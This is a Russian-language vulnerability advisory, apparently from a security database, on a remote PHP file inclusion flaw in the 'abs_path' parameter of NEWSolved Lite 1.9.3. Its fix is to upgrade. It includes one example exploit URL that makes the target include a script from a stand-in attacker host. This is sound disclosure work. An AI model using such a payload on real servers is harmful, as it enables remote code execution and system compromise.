PHP-инклюдинг в NEWSolved Lite

Дата публикации:
14.08.2006
Дата изменения:
24.03.2009
Всего просмотров:
1103
Опасность:
Высокая
Наличие исправления:
Да
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Удаленная
Воздействие:
Компрометация системы
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
NEWSolved Lite 1.x
Уязвимые версии: NEWSolved Lite 1.9.3, возможно другие версии.

Описание:
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.

Уязвимость существует из-за недостаточной обработки входных данных в параметре "abs_path" в сценарии newsscript_lyt.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера. Для удачной эксплуатации уязвимости опция "register_globals" должна быть включена в конфигурационном файле PHP. Пример:

http://[target]/inc/output/news_theme1.php?abs_path=http://evilsite.com?cmd=ls

URL производителя: www.unsolved.net/site/index.php?s=1

Решение: Установите последнюю версию с сайта производителя.

Журнал изменений:
24.03.2009
Изменена секция "Решение"

Ссылки: NEWSolved Lite v1.9.2 (abs_path) Remote File Inclusion

или введите имя

CAPTCHA